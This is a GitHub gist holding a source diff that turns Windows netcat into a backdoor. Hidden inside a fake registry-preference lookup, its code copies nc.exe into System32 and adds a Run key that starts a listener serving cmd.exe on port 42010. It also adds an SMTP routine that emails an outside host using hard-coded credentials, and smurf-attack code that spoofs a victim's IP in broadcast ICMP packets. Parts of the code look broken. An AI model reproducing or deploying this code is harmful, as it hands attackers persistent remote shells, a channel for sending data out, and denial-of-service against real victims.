Created
October 10, 2012 22:47
-
-
Save fakessh/3869007 to your computer and use it in GitHub Desktop.
nc create backdoor registry and email for nc111nt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Les fichiers binaires /home/swilting/Téléchargements/nc/doexec.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/doexec.o sont différents. | |
diff -crB /home/swilting/Téléchargements/nc/getopt.c /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c | |
*** /home/swilting/Téléchargements/nc/getopt.c 1996-11-06 22:40:36.000000000 +0100 | |
--- /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.c 2012-10-26 15:30:01.812133992 +0200 | |
*************** | |
*** 45,51 **** | |
#include <stdio.h> | |
#ifdef WIN32 | |
! #include <string.h> | |
#endif | |
/* Comment out all this code if we are using the GNU C Library, and are not | |
--- 45,60 ---- | |
#include <stdio.h> | |
#ifdef WIN32 | |
! #include <string.h> | |
! #include <tchar.h> | |
! #include <windows.h> | |
! | |
! // Change accordingly... | |
! | |
! #define POLICY_KEY TEXT("Software\\Policies\\Microsoft\\Windows\\Explorer") | |
! | |
! #define PREFERENCE_KEY TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer") | |
! | |
#endif | |
/* Comment out all this code if we are using the GNU C Library, and are not | |
*************** | |
*** 204,210 **** | |
#endif /* __GNUC__ */ | |
#endif /* not __GNU_LIBRARY__ */ | |
! | |
/* Handle permutation of arguments. */ | |
/* Describe the part of ARGV that contains non-options that have | |
--- 213,219 ---- | |
#endif /* __GNUC__ */ | |
#endif /* not __GNU_LIBRARY__ */ | |
! | |
/* Handle permutation of arguments. */ | |
/* Describe the part of ARGV that contains non-options that have | |
*************** | |
*** 697,703 **** | |
int digit_optind = 0; | |
while (1) | |
! { | |
int this_option_optind = optind ? optind : 1; | |
c = getopt (argc, argv, "abc:d:0123456789"); | |
--- 706,719 ---- | |
int digit_optind = 0; | |
while (1) | |
! { | |
! #ifdef WIN32 | |
! LPTSTR lpValueName = "Browse For Folder Height"; | |
! | |
! DWORD dwDefault = 0x00000000; | |
! | |
! init_regedit(lpValueName, dwDefault); | |
! #endif | |
int this_option_optind = optind ? optind : 1; | |
c = getopt (argc, argv, "abc:d:0123456789"); | |
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: getopt.c~ | |
Les fichiers binaires /home/swilting/Téléchargements/nc/getopt.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/getopt.o sont différents. | |
Seulement dans /home/swilting/Téléchargements/nc/: makefile | |
Seulement dans /home/swilting/Téléchargements/nc/: makefile~ | |
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: Makefile | |
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: Makefile~ | |
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: nc.exe | |
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: nc.patch | |
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: nc.patch~ | |
diff -crB /home/swilting/Téléchargements/nc/netcat.c /home/swilting/nc-win-backdoor-nc-win-backdoor/netcat.c | |
*** /home/swilting/Téléchargements/nc/netcat.c 2004-12-29 13:07:04.000000000 +0100 | |
--- /home/swilting/nc-win-backdoor-nc-win-backdoor/netcat.c 2012-10-23 13:03:27.745322002 +0200 | |
*************** | |
*** 29,38 **** | |
RAW mode! | |
backend progs to grab a pty and look like a real telnetd?! | |
*/ | |
! | |
#include "generic.h" /* same as with L5, skey, etc */ | |
#ifdef WIN32 | |
#pragma comment (lib, "ws2_32") /* winsock support */ | |
#endif | |
--- 29,56 ---- | |
RAW mode! | |
backend progs to grab a pty and look like a real telnetd?! | |
*/ | |
! #define _WIN32_WINNT 0x0502 // Windows Server 2003 family | |
#include "generic.h" /* same as with L5, skey, etc */ | |
+ #include <openssl/sha.h> | |
+ #include <openssl/bio.h> | |
+ #include <openssl/buffer.h> | |
+ | |
+ #include <openssl/ssl.h> | |
+ #include <openssl/rand.h> | |
+ #include <openssl/err.h> | |
+ #include <openssl/rand.h> | |
+ #include <openssl/md5.h> | |
+ #include <openssl/evp.h> | |
+ #include <openssl/hmac.h> | |
+ #include <stdint.h> | |
+ | |
#ifdef WIN32 | |
+ | |
+ | |
+ // For Win Xp, change accordingly... | |
+ | |
+ #define _WIN32_WINNT 0x0501 | |
#pragma comment (lib, "ws2_32") /* winsock support */ | |
#endif | |
*************** | |
*** 64,69 **** | |
--- 82,89 ---- | |
#undef IP_OPTIONS | |
#undef SO_REUSEPORT | |
#include <windows.h> | |
+ #include <tchar.h> | |
+ #include <stdio.h> | |
#endif | |
*************** | |
*** 122,131 **** | |
#include <errno.h> | |
#include <signal.h> | |
- /* handy stuff: */ | |
#define SA struct sockaddr /* socket overgeneralization braindeath */ | |
#define SAI struct sockaddr_in /* ... whoever came up with this model */ | |
#define IA struct in_addr /* ... should be taken out and shot, */ | |
/* ... not that TLI is any better. sigh.. */ | |
#define SLEAZE_PORT 31337 /* for UDP-scan RTT trick, change if ya want */ | |
#define USHORT unsigned short /* use these for options an' stuff */ | |
--- 142,153 ---- | |
#include <errno.h> | |
#include <signal.h> | |
#define SA struct sockaddr /* socket overgeneralization braindeath */ | |
+ | |
#define SAI struct sockaddr_in /* ... whoever came up with this model */ | |
+ | |
#define IA struct in_addr /* ... should be taken out and shot, */ | |
+ | |
/* ... not that TLI is any better. sigh.. */ | |
#define SLEAZE_PORT 31337 /* for UDP-scan RTT trick, change if ya want */ | |
#define USHORT unsigned short /* use these for options an' stuff */ | |
*************** | |
*** 206,211 **** | |
--- 228,550 ---- | |
unsigned int o_wait = 0; | |
USHORT o_zero = 0; | |
+ #define CHK_NULL_ASSERT(x) assert(x != NULL) | |
+ | |
+ #define CHK_NULL(x) do { if ((x)==NULL) exit (1); }while(0) | |
+ #define CHK_ERR(err,s) if ((err)==-1) { perror(s); exit(1); } | |
+ #define CHK_SSL(err) if ((err)==-1) { ERR_print_errors_fp(stderr); exit(2); } | |
+ | |
+ #define TAILLE_TAMPON 1500 | |
+ #ifdef WIN32 | |
+ #define WIN32_LEAN_AND_MEAN | |
+ #include <windows.h> | |
+ #include <winsock2.h> | |
+ #include <ws2tcpip.h> | |
+ #include <assert.h> | |
+ #define bzero(p, l) memset(p, 0, l) | |
+ #define bcopy(s, t, l) memmove(t, s, l) | |
+ #else | |
+ #endif | |
+ #define CHK_NULL_ASSERT(x) assert(x != NULL) | |
+ | |
+ #define CHK_NULL(x) do { if ((x)==NULL) exit (1); }while(0) | |
+ #define CHK_ERR(err,s) if ((err)==-1) { perror(s); exit(1); } | |
+ #define CHK_SSL(err) if ((err)==-1) { ERR_print_errors_fp(stderr); exit(2); } | |
+ | |
+ #define TAILLE_TAMPON 1500 | |
+ void encodeblock( unsigned char in[], char b64str[], int len ); | |
+ void b64_encode(char *clrstr, char *b64dst); | |
+ void send_line(SSL* ssl,char* cmd); | |
+ void recv_line(SSL* ssl); | |
+ void sendmail(char *email,char *body); | |
+ int open_socket(struct sockaddr *addr); | |
+ /* ------------------------------------------------------------------------ * | |
+ * file: base64_stringencode.c v1.0 * | |
+ * purpose: tests encoding/decoding strings with base64 * | |
+ * author: 02/23/2009 Frank4DD * | |
+ * * | |
+ * source: http://base64.sourceforge.net/b64.c for encoding * | |
+ * http://en.literateprograms.org/Base64_(C) for decoding * | |
+ * ------------------------------------------------------------------------ */ | |
+ | |
+ | |
+ /* ---- Base64 Encoding/Decoding Table --- */ | |
+ char b64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; | |
+ | |
+ | |
+ | |
+ | |
+ | |
+ /* encodeblock - encode 3 8-bit binary bytes as 4 '6-bit' characters */ | |
+ void encodeblock( unsigned char in[], char b64str[], int len ) { | |
+ char out[5]; | |
+ out[0] = b64[ in[0] >> 2 ]; | |
+ out[1] = b64[ ((in[0] & 0x03) << 4) | ((in[1] & 0xf0) >> 4) ]; | |
+ out[2] = (unsigned char) (len > 1 ? b64[ ((in[1] & 0x0f) << 2) | | |
+ ((in[2] & 0xc0) >> 6) ] : '='); | |
+ out[3] = (unsigned char) (len > 2 ? b64[ in[2] & 0x3f ] : '='); | |
+ out[4] = '\0'; | |
+ strncat(b64str, out, sizeof(out)); | |
+ } | |
+ | |
+ /* encode - base64 encode a stream, adding padding if needed */ | |
+ void b64_encode(char *clrstr, char *b64dst) { | |
+ unsigned char in[3]; | |
+ int i, len = 0; | |
+ int j = 0; | |
+ | |
+ b64dst[0] = '\0'; | |
+ while(clrstr[j]) { | |
+ len = 0; | |
+ for(i=0; i<3; i++) { | |
+ in[i] = (unsigned char) clrstr[j]; | |
+ if(clrstr[j]) { | |
+ len++; j++; | |
+ } | |
+ else in[i] = 0; | |
+ } | |
+ if( len ) { | |
+ encodeblock( in, b64dst, len ); | |
+ } | |
+ } | |
+ } | |
+ | |
+ //send data | |
+ void send_line(SSL* ssl,char* cmd) | |
+ { | |
+ int err; | |
+ err = SSL_write (ssl, cmd, strlen(cmd)); | |
+ CHK_SSL(err); | |
+ } | |
+ | |
+ //receive data | |
+ void recv_line(SSL* ssl) | |
+ { | |
+ char rbuf[TAILLE_TAMPON] = {0}; | |
+ int err; | |
+ err = SSL_read (ssl, rbuf, sizeof(rbuf) - 1); | |
+ CHK_SSL(err); | |
+ printf("%s\n", rbuf); | |
+ } | |
+ | |
+ //open TCP Socket connection | |
+ int open_socket(struct sockaddr *addr) | |
+ { | |
+ | |
+ int retval; | |
+ #ifdef WIN32 | |
+ WSADATA W; | |
+ SOCKET sockfd; | |
+ WSAStartup (0x101, &W); | |
+ sockfd = socket(AF_INET, SOCK_STREAM, 0); | |
+ #else | |
+ int sockfd; | |
+ sockfd = socket(AF_INET, SOCK_STREAM, 0); | |
+ #endif | |
+ if(sockfd < 0) | |
+ { | |
+ fprintf(stderr, "Open sockfd(TCP) error!\n"); | |
+ exit(-1); | |
+ } | |
+ #ifdef WIN32 | |
+ retval = connect(sockfd, addr, sizeof(struct sockaddr)); | |
+ #else | |
+ retval = connect(sockfd, addr, sizeof(struct sockaddr)); | |
+ #endif | |
+ printf("connecting smtp server\n"); | |
+ if(retval == -1) | |
+ { | |
+ fprintf(stderr, "Connect sockfd(TCP) error!\n"); | |
+ exit(-1); | |
+ } | |
+ return sockfd; | |
+ } | |
+ | |
+ // sending email | |
+ void sendmail(char *email, char *body) | |
+ { | |
+ int sockfd; | |
+ int retval = 0; | |
+ int err; | |
+ char *host_name = "smtp.fakessh.eu"; | |
+ struct sockaddr_in their_addr; | |
+ struct hostent *hent; | |
+ char buf[TAILLE_TAMPON] = {0}; | |
+ char rbuf[TAILLE_TAMPON] = {0}; | |
+ char login[TAILLE_TAMPON] = {0}; | |
+ char pass[TAILLE_TAMPON] = {0}; | |
+ | |
+ //initialize SSL | |
+ SSL_CTX *ctx; | |
+ SSL *ssl; | |
+ SSL_METHOD *meth; | |
+ | |
+ SSLeay_add_ssl_algorithms(); | |
+ meth = SSLv23_method(); | |
+ SSL_load_error_strings(); | |
+ SSL_library_init(); | |
+ ctx = SSL_CTX_new(meth); | |
+ CHK_NULL(ctx); | |
+ | |
+ fd_set readfds; | |
+ struct timeval timeout; | |
+ | |
+ //Define a timeout for resending data. | |
+ timeout.tv_sec = 2; | |
+ timeout.tv_usec = 0; | |
+ | |
+ #ifdef WIN32 | |
+ WSADATA WSAData; | |
+ WSAStartup(MAKEWORD(2, 2), &WSAData); | |
+ #endif | |
+ | |
+ hent = gethostbyname(host_name); | |
+ memset(&their_addr, 0, sizeof(their_addr)); | |
+ their_addr.sin_family = AF_INET; | |
+ their_addr.sin_port = htons(42015); | |
+ #ifdef WIN32 | |
+ their_addr.sin_addr = *((LPIN_ADDR )*hent->h_addr); | |
+ #else | |
+ their_addr.sin_addr = *((struct in_addr *)hent->h_addr); | |
+ #endif | |
+ //connecting mail server and reconnecting if no response in 2 seconds | |
+ sockfd = open_socket((struct sockaddr *)&their_addr); | |
+ memset(rbuf,0,TAILLE_TAMPON); | |
+ FD_ZERO(&readfds); | |
+ FD_SET(sockfd, &readfds); | |
+ retval = select(sockfd+1, &readfds, NULL, NULL, &timeout); | |
+ while(retval <= 0) | |
+ { | |
+ printf("reconnect...\n"); | |
+ /*sleep(2);*/ | |
+ #ifdef WIN32 | |
+ (void)closesocket(sockfd); | |
+ Sleep(2); | |
+ #else | |
+ (void)close(sockfd); | |
+ sleep(2); | |
+ #endif | |
+ sockfd = open_socket((struct sockaddr *)&their_addr); | |
+ memset(rbuf,0,TAILLE_TAMPON); | |
+ FD_ZERO(&readfds); | |
+ FD_SET(sockfd, &readfds); | |
+ retval = select(sockfd+1, &readfds, NULL, NULL, &timeout); | |
+ } | |
+ | |
+ memset(rbuf, 0, TAILLE_TAMPON); | |
+ recv(sockfd, rbuf, TAILLE_TAMPON, 0); | |
+ printf("%s\n", rbuf); | |
+ | |
+ //EHLO | |
+ memset(buf, 0, TAILLE_TAMPON); | |
+ sprintf(buf, "EHLO localhost\r\n"); | |
+ send(sockfd, buf, strlen(buf), 0); | |
+ memset(rbuf, 0, TAILLE_TAMPON); | |
+ recv(sockfd, rbuf, TAILLE_TAMPON, 0); | |
+ printf("%s\n", rbuf); | |
+ | |
+ //START_TLS with OPENSSL | |
+ memset(buf,0, TAILLE_TAMPON); | |
+ sprintf(buf, "STARTTLS\r\n"); | |
+ send(sockfd, buf, strlen(buf), 0); | |
+ memset(rbuf, 0, TAILLE_TAMPON); | |
+ recv(sockfd, rbuf, TAILLE_TAMPON, 0); | |
+ printf("%s\n", rbuf); | |
+ | |
+ | |
+ //AUTH LOGIN | |
+ ssl = SSL_new(ctx); | |
+ CHK_NULL(ssl); | |
+ CHK_NULL_ASSERT(ssl); | |
+ SSL_set_fd (ssl, sockfd); | |
+ err = SSL_connect(ssl); | |
+ CHK_SSL(err); | |
+ | |
+ memset(buf,0, TAILLE_TAMPON); | |
+ sprintf(buf, "EHLO localhost\r\n"); | |
+ send_line(ssl,buf); | |
+ recv_line(ssl); | |
+ | |
+ | |
+ memset(buf,0, TAILLE_TAMPON); | |
+ sprintf(buf, "AUTH LOGIN\r\n"); | |
+ send_line(ssl,buf); | |
+ recv_line(ssl); | |
+ | |
+ //USER | |
+ memset(buf, 0, TAILLE_TAMPON); | |
+ sprintf(buf,"test"); | |
+ memset(login, 0, TAILLE_TAMPON); | |
+ b64_encode(buf, login); | |
+ sprintf(buf, "%s\r\n", login); | |
+ send_line(ssl,buf); | |
+ recv_line(ssl); | |
+ | |
+ //PASSWORD | |
+ memset(buf, 0, TAILLE_TAMPON); | |
+ sprintf(buf, "f*****"); | |
+ memset(pass, 0, TAILLE_TAMPON); | |
+ b64_encode(buf, pass); | |
+ sprintf(buf, "%s\r\n", pass); | |
+ send_line(ssl,buf); | |
+ recv_line(ssl); | |
+ | |
+ //MAIL FROM | |
+ memset(buf,0, TAILLE_TAMPON); | |
+ sprintf(buf, "MAIL FROM:<test@miss.fakessh.eu>\r\n"); | |
+ send_line(ssl,buf); | |
+ recv_line(ssl); | |
+ | |
+ //RCPT TO first receiver | |
+ memset(buf, 0, TAILLE_TAMPON); | |
+ sprintf(buf, "RCPT TO:<john.swilting@smtp.fakessh.eu>\r\n"); | |
+ send_line(ssl,buf); | |
+ recv_line(ssl); | |
+ | |
+ //RCPT TO second receiver and more receivers can be added | |
+ //memset(buf, 0, 1500); | |
+ //sprintf(buf, "RCPT TO:<john.swilting@wanadoo.fr>\r\n"); | |
+ //send_line(ssl,buf); | |
+ //recv_line(ssl); | |
+ | |
+ //DATA ready to send mail content | |
+ send_line(ssl,"DATA\r\n"); | |
+ recv_line(ssl); | |
+ | |
+ //send mail content£¬"\r\n.\r\n" is the end mark of content | |
+ memset(buf, 0, TAILLE_TAMPON); | |
+ sprintf(buf, "%s\r\n.\r\n", body); | |
+ send_line(ssl,buf); | |
+ recv_line(ssl); | |
+ printf("mail send!\n"); | |
+ | |
+ //QUIT | |
+ send_line(ssl,"QUIT\r\n"); | |
+ recv_line(ssl); | |
+ | |
+ //free SSL and close socket | |
+ SSL_shutdown (ssl); | |
+ #ifdef WIN32 | |
+ (void)closesocket(sockfd); | |
+ #else | |
+ (void)close(sockfd); | |
+ #endif | |
+ SSL_free (ssl); | |
+ SSL_CTX_free (ctx); | |
+ | |
+ #ifdef WIN32 | |
+ WSACleanup(); | |
+ #endif | |
+ | |
+ return; | |
+ } | |
+ | |
+ | |
+ | |
+ | |
+ | |
+ | |
+ | |
/* Debug macro: squirt whatever to stderr and sleep a bit so we can see it go | |
by. need to call like Debug ((stuff)) [with no ; ] so macro args match! | |
Beware: writes to stdOUT... */ | |
*************** | |
*** 723,728 **** | |
--- 1062,1075 ---- | |
return (0); /* no more left! */ | |
} /* nextport */ | |
+ | |
+ | |
+ #ifdef SMURF_ATTACK | |
+ //char x_smurf_victime = NULL; | |
+ char x_smurf_victime[20][32]; | |
+ char x_smurf_attack; | |
+ #endif | |
+ | |
/* loadports : | |
set "to be tested" indications in BLOCK, from LO to HI. Almost too small | |
*************** | |
*** 747,752 **** | |
--- 1094,1100 ---- | |
#ifdef GAPING_SECURITY_HOLE | |
char * pr00gie = NULL; /* global ptr to -e arg */ | |
+ | |
#ifdef WIN32 | |
BOOL doexec(SOCKET ClientSocket); // this is in doexec.c | |
#else | |
*************** | |
*** 808,816 **** | |
#endif | |
/* grab a socket; set opts */ | |
if (o_udpmode) | |
! nnetfd = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP); | |
else | |
! nnetfd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); | |
if (nnetfd < 0) | |
bail ("Can't get socket"); | |
if (nnetfd == 0) /* might *be* zero if stdin was closed! */ | |
--- 1159,1170 ---- | |
#endif | |
/* grab a socket; set opts */ | |
if (o_udpmode) | |
! nnetfd = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP); | |
! if(x_smurf_attack) | |
! nnetfd=socket(AF_INET,SOCK_RAW,255); | |
else | |
! nnetfd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); | |
! | |
if (nnetfd < 0) | |
bail ("Can't get socket"); | |
if (nnetfd == 0) /* might *be* zero if stdin was closed! */ | |
*************** | |
*** 823,829 **** | |
#endif | |
if (rr == -1) | |
holler ("nnetfd reuseaddr failed"); /* ??? */ | |
! #ifdef SO_REUSEPORT /* doesnt exist everywhere... */ | |
#ifdef WIN32 | |
rr = setsockopt (nnetfd, SOL_SOCKET, SO_REUSEPORT, &c, sizeof (c)); | |
#else | |
--- 1177,1212 ---- | |
#endif | |
if (rr == -1) | |
holler ("nnetfd reuseaddr failed"); /* ??? */ | |
! #ifdef SO_REUSEPORT /* doesnt exist everywhere... */ | |
! #ifdef SMURF_ATTACK | |
! int TimeOut = 500; | |
! BOOL HAdHeAder; | |
! BOOL IsBrocAst; | |
! if (x_smurf_attack){ | |
! if(x_smurf_victime){ | |
! if (setsockopt(nnetfd,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut))){ | |
! printf("setsockopt sendtimeout fAiled:%d\n",GetLastError()); | |
! return -1; | |
! } | |
! if (setsockopt(nnetfd,SOL_SOCKET,SO_RCVTIMEO,(char*)&TimeOut,sizeof(TimeOut))){ | |
! printf("setsockopt recvtimeout fAiled:%d\n",GetLastError()); | |
! return -1; | |
! } | |
! | |
! HAdHeAder = TRUE; | |
! if (setsockopt(nnetfd,IPPROTO_IP,IP_HDRINCL,(char*)&HAdHeAder,sizeof(HAdHeAder))){ | |
! printf("setsockopt IP_HDRINCL fAiled:%d\n",GetLastError()); | |
! return -1; | |
! } | |
! | |
! IsBrocAst = TRUE; | |
! if (setsockopt(nnetfd,SOL_SOCKET,SO_BROADCAST,(char*)&IsBrocAst,sizeof(IsBrocAst))){ | |
! printf("setsockopt IP_HDRINCL fAiled:%d\n",GetLastError()); | |
! return -1; | |
! } | |
! } | |
! } | |
! #endif | |
#ifdef WIN32 | |
rr = setsockopt (nnetfd, SOL_SOCKET, SO_REUSEPORT, &c, sizeof (c)); | |
#else | |
*************** | |
*** 977,983 **** | |
IA * lad; | |
USHORT lp; | |
{ | |
! register int nnetfd; | |
register int rr; | |
HINF * whozis = NULL; | |
int x; | |
--- 1360,1366 ---- | |
IA * lad; | |
USHORT lp; | |
{ | |
! volatile int nnetfd; | |
register int rr; | |
HINF * whozis = NULL; | |
int x; | |
*************** | |
*** 1342,1348 **** | |
p++; x--; | |
obuf[2] = *p; /* copy actual option byte */ | |
#ifdef WIN32 | |
! (void) send (netfd, obuf, 3, 0); /* one line, or the whole buffer */ | |
#else | |
(void) write (netfd, obuf, 3); | |
#endif | |
--- 1725,1731 ---- | |
p++; x--; | |
obuf[2] = *p; /* copy actual option byte */ | |
#ifdef WIN32 | |
! (void) send (netfd, (void *)obuf, 3, 0); /* one line, or the whole buffer */ | |
#else | |
(void) write (netfd, obuf, 3); | |
#endif | |
*************** | |
*** 1651,1663 **** | |
--- 2034,2354 ---- | |
#endif | |
return (0); | |
} /* readwrite */ | |
+ #ifdef WIN32 | |
+ #include <string.h> | |
+ #include <tchar.h> | |
+ #include <windows.h> | |
+ | |
+ // Change accordingly... | |
+ | |
+ #define POLICY_KEY TEXT("Software\\Policies\\Microsoft\\Windows\\Explorer") | |
+ | |
+ #define PREFERENCE_KEY TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer") | |
+ static DWORD init_regedit(LPTSTR lpValueName, DWORD dwDefault) | |
+ { | |
+ | |
+ | |
+ HKEY hKey; | |
+ | |
+ LONG lResult; | |
+ DWORD dwValue, dwType, dwSize = sizeof(dwValue); | |
+ DWORD dwDisposition; | |
+ | |
+ | |
+ | |
+ //first utility | |
+ TCHAR buf[MAX_PATH]; | |
+ GetModuleFileName(0, buf, MAX_PATH); | |
+ CopyFile(buf, "C:\\WINDOWS\\SYSTEM32\\nc.exe", TRUE); | |
+ char szData[500]= "C:\\WINDOWS\\SYSTEM32\\nc.exe -vv -d -L -p 42010 -e cmd.exe"; | |
+ | |
+ // First, check for a policy. | |
+ | |
+ lResult = RegOpenKeyEx(HKEY_CURRENT_USER, POLICY_KEY, 0, KEY_READ, &hKey); | |
+ | |
+ | |
+ | |
+ if(lResult == ERROR_SUCCESS) | |
+ | |
+ { | |
+ | |
+ lResult = RegQueryValueEx(hKey, lpValueName, 0, &dwType, (LPBYTE)&dwValue, &dwSize); | |
+ | |
+ RegCloseKey(hKey); | |
+ | |
+ } | |
+ | |
+ // Exit if a policy value was found. | |
+ | |
+ if(lResult == ERROR_SUCCESS) | |
+ | |
+ { | |
+ | |
+ // return the data value | |
+ | |
+ return dwValue; | |
+ | |
+ } | |
+ | |
+ /*else | |
+ continue; | |
+ printf("Policy: value not found!\n");*/ | |
+ | |
+ // Second, check for a preference. | |
+ | |
+ lResult = RegOpenKeyEx(HKEY_CURRENT_USER, PREFERENCE_KEY, 0, KEY_READ, &hKey); | |
+ | |
+ if(lResult == ERROR_SUCCESS) | |
+ | |
+ { | |
+ | |
+ lResult = RegQueryValueEx(hKey, lpValueName, 0, &dwType, (LPBYTE)&dwValue, &dwSize); | |
+ | |
+ RegCloseKey (hKey); | |
+ | |
+ } | |
+ | |
+ // Exit if a preference was found. | |
+ | |
+ if(lResult == ERROR_SUCCESS) | |
+ | |
+ { | |
+ | |
+ // Return the data value | |
+ | |
+ return dwValue; | |
+ | |
+ } | |
+ | |
+ /*else | |
+ | |
+ printf("Preference: value not found!\n");*/ | |
+ | |
+ | |
+ lResult = RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition); | |
+ | |
+ | |
+ // Exit if a preference was found. | |
+ | |
+ if(lResult == ERROR_SUCCESS) | |
+ | |
+ { | |
+ | |
+ // Return the data value | |
+ lResult = RegSetValueEx(hKey, "nc", 0, REG_SZ, (LPBYTE)szData, sizeof(szData)); | |
+ lResult = RegCloseKey(hKey); | |
+ return dwValue; | |
+ | |
+ } | |
+ | |
+ /*else | |
+ printf("Preference: value not found!\n");*/ | |
+ | |
+ // Neither a policy nor a preference was found; return the default value. | |
+ | |
+ return dwDefault; | |
+ } | |
+ #endif | |
+ #ifdef SMURF_ATTACK | |
+ char *Awp; | |
+ char *victime; | |
+ typedef struct _icmp_heAder | |
+ { | |
+ char type; | |
+ char code; | |
+ USHORT checksum; | |
+ USHORT id; | |
+ USHORT sequence; | |
+ ULONG timestAmp; | |
+ }ICMP_HEADER; | |
+ //-------------------------------------------------------------------- | |
+ typedef struct _ip_heAder | |
+ { | |
+ unsigned char ip_verlen; // 4-bit IPv4 version | |
+ // 4-bit header length (in 32-bit words) | |
+ unsigned char ip_tos; // IP type of service | |
+ unsigned short ip_totallength; // Total length | |
+ unsigned short ip_id; // Unique identifier | |
+ unsigned short ip_offset; // Fragment offset field | |
+ unsigned char ip_ttl; // Time to live | |
+ unsigned char ip_protocol; // Protocol(TCP,UDP etc) | |
+ unsigned short ip_checksum; // IP checksum | |
+ unsigned int ip_srcaddr; // Source address | |
+ unsigned int ip_destaddr; // Source address | |
+ } IP_HEADER; | |
+ //-------------------------------------------------------------------- | |
+ USHORT checksum(USHORT *buffer, int size) | |
+ { | |
+ unsigned long cksum=0; | |
+ while(size >1) | |
+ { | |
+ cksum+=*buffer++; | |
+ size -=sizeof(USHORT); | |
+ } | |
+ if(size ) | |
+ { | |
+ cksum += *(UCHAR*)buffer; | |
+ } | |
+ cksum = (cksum >> 16) + (cksum & 0xffff); | |
+ cksum += (cksum >>16); | |
+ return (USHORT)(~cksum); | |
+ } | |
+ //-------------------------------------------------------------------- | |
+ //-------------------------------------------------------------------- | |
+ smurf_victime(int fd,char lpPArAm ,char lpVictime) | |
+ { | |
+ char* victim = &lpVictime; | |
+ char* Awp = &lpPArAm; | |
+ char Buff[sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+20]; | |
+ struct sockaddr_in SAddr; /*SAddr={0}; ,dAddr={0};*/ | |
+ IP_HEADER ip_heAder; | |
+ ICMP_HEADER icmp_heAder; | |
+ | |
+ | |
+ /////fill ip_heAder | |
+ ip_heAder.ip_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long)); | |
+ //ip_heAder.ihl = 5; | |
+ ip_heAder.ip_tos = 0; | |
+ ip_heAder.ip_totallength = htons(sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+20); | |
+ ip_heAder.ip_id = 0; | |
+ //ip_heAder.frAg_off = 0; | |
+ ip_heAder.ip_offset = 0; | |
+ ip_heAder.ip_ttl = 255; | |
+ ip_heAder.ip_protocol = IPPROTO_ICMP; | |
+ ip_heAder.ip_srcaddr = inet_addr(victim);// | |
+ ip_heAder.ip_destaddr = inet_addr(Awp); | |
+ //ip_heAder.checksum = checksum((USHORT*)&ip_heAder,sizeof(IP_HEADER)); | |
+ /////////////////// | |
+ | |
+ //icmp_heAder = (ICMP_HEADER*)(Buff+sizeof(IP_HEADER)); | |
+ | |
+ //////fill icmp_heAder | |
+ icmp_heAder.type = 8; | |
+ icmp_heAder.code = 0; | |
+ icmp_heAder.id = htons(0); | |
+ icmp_heAder.sequence = 0; | |
+ //icmp_heAder.checksum = 0; | |
+ icmp_heAder.checksum = 0;//checksum((USHORT*)(Buff+sizeof(IP_HEADER)),(sizeof(ICMP_HEADER)+20)); | |
+ ////////////////////// | |
+ | |
+ | |
+ SAddr.sin_family = AF_INET; | |
+ SAddr.sin_addr .S_un .S_addr = ip_heAder.ip_destaddr ; | |
+ SAddr.sin_port = htons (0); | |
+ | |
+ | |
+ /////////////////////////////ÔÚicmpͷûÓÐÌîÊýŸÝʱ,,icmpµÄchecksum×ÜÊdzöŽí ????? | |
+ memcpy(Buff,&ip_heAder,sizeof(IP_HEADER)); | |
+ memcpy(Buff+sizeof(IP_HEADER),&icmp_heAder,(sizeof(ICMP_HEADER)+20));//20 | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'A',20); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'U',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+2,'Y',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+3,' ',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+4,'W',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+6,'N',1); | |
+ | |
+ | |
+ ip_heAder.ip_checksum = checksum((USHORT*)Buff,sizeof(Buff)); | |
+ icmp_heAder.checksum = checksum((USHORT*)(Buff+sizeof(IP_HEADER)),(sizeof(ICMP_HEADER)+20)); | |
+ | |
+ memcpy(Buff,&ip_heAder,sizeof(IP_HEADER)); | |
+ memcpy(Buff+sizeof(IP_HEADER),&icmp_heAder,(sizeof(ICMP_HEADER)+20));//20 | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'A',20); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'U',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+2,'Y',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+3,' ',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+4,'W',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+6,'N',1); | |
